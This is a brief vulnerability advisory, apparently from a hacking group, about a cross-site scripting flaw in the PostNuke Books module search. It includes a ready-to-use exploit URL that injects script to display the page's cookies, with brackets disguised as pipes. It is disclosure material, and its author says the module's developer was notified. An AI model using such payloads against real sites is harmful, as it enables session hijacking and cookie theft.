- ---------------------------------------------------- Class : input Validation Error Risk : Due to the simplicity of the attack and the number of sites that run module books the risk is classified as Medium to High. URL: Http://pn-mod-books.sourceforge.net - ---------------------------------------------------- This Books module version v0.54 is running as a Mutant (PN 0.64) This Books module version v0.6 is running as a Rogue (PN 0.7) - ---------------------------------------------------- Exploit: http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script| Change | x <> - ------------------------------------------------------- Programmer of Books module receives a copy this report. - -------------------------------------------------------- Salu2 Pistone - - -------- Http://www.gauchohack.com.ar Http://www.hackindex.org